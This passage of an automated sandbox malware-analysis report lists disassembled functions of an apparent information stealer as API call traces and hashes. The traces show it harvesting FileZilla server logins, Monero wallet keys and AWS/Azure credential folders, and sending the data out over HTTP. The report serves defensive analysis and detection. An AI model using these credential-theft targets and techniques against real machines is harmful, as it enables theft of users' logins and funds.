                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00DD0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00DE0DBA,00DE0DB7,00DE0DB6,00DE0DB3), ref: 00DD0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00DD0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00DD03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00DD0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00DD0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00DD0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00DD0571
                                • lstrcat.KERNEL32(?,url: ), ref: 00DD0580
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD0593
                                • lstrcat.KERNEL32(?,00DE1678), ref: 00DD05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD05B5
                                • lstrcat.KERNEL32(?,00DE167C), ref: 00DD05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00DD05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD05E6
                                • lstrcat.KERNEL32(?,00DE1688), ref: 00DD05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00DD0604
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD0617
                                • lstrcat.KERNEL32(?,00DE1698), ref: 00DD0626
                                • lstrcat.KERNEL32(?,00DE169C), ref: 00DD0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 1d51e20499b8e769943e50874cf976460092c82b5745a6aecfe8d7845c6dc2f9
                                • Instruction ID: bae5b63844cc2583a24ad9a456cd23298c6286fd17206889ec00ea080c4b0a4d
                                • Opcode Fuzzy Hash: 1d51e20499b8e769943e50874cf976460092c82b5745a6aecfe8d7845c6dc2f9
                                • Instruction Fuzzy Hash: A6D13B71A00208ABCB14FBF4DD96EEE7738EF54300F508519F502A7285EE75AA0ADB71
                                Function 00DC5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DC59F8
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0162EA88,00000000,?,0162A4E0,00000000,?,00DE1A1C), ref: 00DC5E71
                                • lstrlen.KERNEL32(00000000), ref: 00DC5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00DC5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC5E9A
                                • lstrlen.KERNEL32(00000000), ref: 00DC5EAF
                                • lstrlen.KERNEL32(00000000), ref: 00DC5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DC5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00DC5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DC5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00DC5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00DC5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00DC5FBD
                                • HttpOpenRequestA.WININET(00000000,0162E9D8,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC5BF8
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00DC5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: b282de162cfa55a79ad3ebdba361919ece4e7c2baa2ffdca3b6cd300a580c86a
                                • Instruction ID: a4d4bc963304515209db162b52e437e91f41d067f9903f06284b2b8861a3d894
                                • Opcode Fuzzy Hash: b282de162cfa55a79ad3ebdba361919ece4e7c2baa2ffdca3b6cd300a580c86a
                                • Instruction Fuzzy Hash: 6D121F71920128AADB15EBA4DC95FEEB378FF14700F4081AAB50663191EF742B4ACF75
                                Function 00DCCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DCD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DCD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD208
                                • lstrcat.KERNEL32(?,00DE1478), ref: 00DCD217
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD22A
                                • lstrcat.KERNEL32(?,00DE147C), ref: 00DCD239
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD24C
                                • lstrcat.KERNEL32(?,00DE1480), ref: 00DCD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD26E
                                • lstrcat.KERNEL32(?,00DE1484), ref: 00DCD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD290
                                • lstrcat.KERNEL32(?,00DE1488), ref: 00DCD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD2B2
                                • lstrcat.KERNEL32(?,00DE148C), ref: 00DCD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD2D4
                                • lstrcat.KERNEL32(?,00DE1490), ref: 00DCD2E3
                                  • Part of subcall function 00DDA820: lstrlen.KERNEL32(00DC4F05,?,?,00DC4F05,00DE0DDE), ref: 00DDA82B
                                  • Part of subcall function 00DDA820: lstrcpy.KERNEL32(00DE0DDE,00000000), ref: 00DDA885
                                • lstrlen.KERNEL32(?), ref: 00DCD32A
                                • lstrlen.KERNEL32(?), ref: 00DCD339
                                  • Part of subcall function 00DDAA70: StrCmpCA.SHLWAPI(01628FB8,00DCA7A7,?,00DCA7A7,01628FB8), ref: 00DDAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: eef63c011a3dd9a5d010b80769714932e7dddfa45ea347cfeffa4e64008abcd2
                                • Instruction ID: 0768954521771b1396e7a8a8318e18f9b2bd229d4d15748a63648bac61a2fcb8
                                • Opcode Fuzzy Hash: eef63c011a3dd9a5d010b80769714932e7dddfa45ea347cfeffa4e64008abcd2
                                • Instruction Fuzzy Hash: 45E16E71910219ABCB15FBA4DD96EEE7338FF14300F10815AF507A3291DE39AA09DB72
                                Function 00DCC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0162D488,00000000,?,00DE144C,00000000,?,?), ref: 00DCCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00DCCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00DCCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DCCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00DCCAD9
                                • StrStrA.SHLWAPI(?,0162D428,00DE0B52), ref: 00DCCAF7
                                • StrStrA.SHLWAPI(00000000,0162D458), ref: 00DCCB1E
                                • StrStrA.SHLWAPI(?,0162DA00,00000000,?,00DE1458,00000000,?,00000000,00000000,?,016290E8,00000000,?,00DE1454,00000000,?), ref: 00DCCCA2
                                • StrStrA.SHLWAPI(00000000,0162DA60), ref: 00DCCCB9
                                  • Part of subcall function 00DCC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DCC871
                                  • Part of subcall function 00DCC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DCC87C
                                • StrStrA.SHLWAPI(?,0162DA60,00000000,?,00DE145C,00000000,?,00000000,01629058), ref: 00DCCD5A
                                • StrStrA.SHLWAPI(00000000,016291A8), ref: 00DCCD71
                                  • Part of subcall function 00DCC820: lstrcat.KERNEL32(?,00DE0B46), ref: 00DCC943
                                  • Part of subcall function 00DCC820: lstrcat.KERNEL32(?,00DE0B47), ref: 00DCC957
                                  • Part of subcall function 00DCC820: lstrcat.KERNEL32(?,00DE0B4E), ref: 00DCC978
                                • lstrlen.KERNEL32(00000000), ref: 00DCCE44
                                • CloseHandle.KERNEL32(00000000), ref: 00DCCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 2f8c3cf8a5659fd59c5d1e36a067220c247b59ec2cc48142667446d0aa5b9f9b
                                • Instruction ID: d6eacb15c411033c0da7f2a43432d79e4cc27f0d455dd4d7000ffcfad1e7a241
                                • Opcode Fuzzy Hash: 2f8c3cf8a5659fd59c5d1e36a067220c247b59ec2cc48142667446d0aa5b9f9b
                                • Instruction Fuzzy Hash: FCE13C71910158ABDB15EBA8DC92FEEB778EF14300F40815AF506A3291EF346A4ACF75
                                Function 00DD8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • RegOpenKeyExA.ADVAPI32(00000000,0162B048,00000000,00020019,00000000,00DE05B6), ref: 00DD83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DD8426
                                • wsprintfA.USER32 ref: 00DD8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DD847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD8499
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 187943b1652f99ac8d2d521ce5f466605674e08be1342ea45413c888272029a8
                                • Instruction ID: 180bd8deb7bf137fc04db5c1520b38072abc76b67a4177bbbea59b9dece65d6d
                                • Opcode Fuzzy Hash: 187943b1652f99ac8d2d521ce5f466605674e08be1342ea45413c888272029a8
                                • Instruction Fuzzy Hash: 78810D71910218ABDB25DB54CC95FEA77B8FF08700F00C29AE549A6240DF75AB85DFB4
                                Function 00DD4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00DD4DCD
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD492C
                                  • Part of subcall function 00DD4910: FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00DD4E59
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FDC), ref: 00DD4971
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FE0), ref: 00DD4987
                                  • Part of subcall function 00DD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DD4B7D
                                  • Part of subcall function 00DD4910: FindClose.KERNEL32(000000FF), ref: 00DD4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DD4EE5
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD49B0
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE08D2), ref: 00DD49C5
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD49E2
                                  • Part of subcall function 00DD4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DD4A1E
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,0162E9B8), ref: 00DD4A4A
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,00DE0FF8), ref: 00DD4A5C
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,?), ref: 00DD4A70
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,00DE0FFC), ref: 00DD4A82
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,?), ref: 00DD4A96
                                  • Part of subcall function 00DD4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DD4AAC
                                  • Part of subcall function 00DD4910: DeleteFileA.KERNEL32(?), ref: 00DD4B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
